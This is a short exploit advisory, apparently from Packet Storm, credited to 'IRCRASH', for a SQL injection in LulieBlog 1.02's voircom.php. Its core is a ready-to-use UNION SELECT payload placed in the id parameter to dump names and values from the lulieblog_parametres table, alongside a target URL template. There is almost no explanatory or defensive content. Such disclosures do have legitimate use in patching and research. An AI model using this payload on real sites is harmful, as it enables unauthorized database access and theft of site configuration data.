LulieBlog version 1.02 suffers from a remote SQL injection vulnerability in voircom.php.
9205cfb1ce3c419a94b91d33289f4d544401fa07946f02846382e35e3d095f16#####################################################################################
#### LulieBlog Version 1.02 Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash) #
# #
#Script Download : http://sourceforge.net/project/platformdownload.php?group_id=204083
# #
#Injection Adress : http://Sitename/voircom.php?id=[SQL CODE] #
# #
# #
#[SQL CODE] : -1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
# #
# Our site : HTTP://IRCRASH.COM #
# #
#####################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed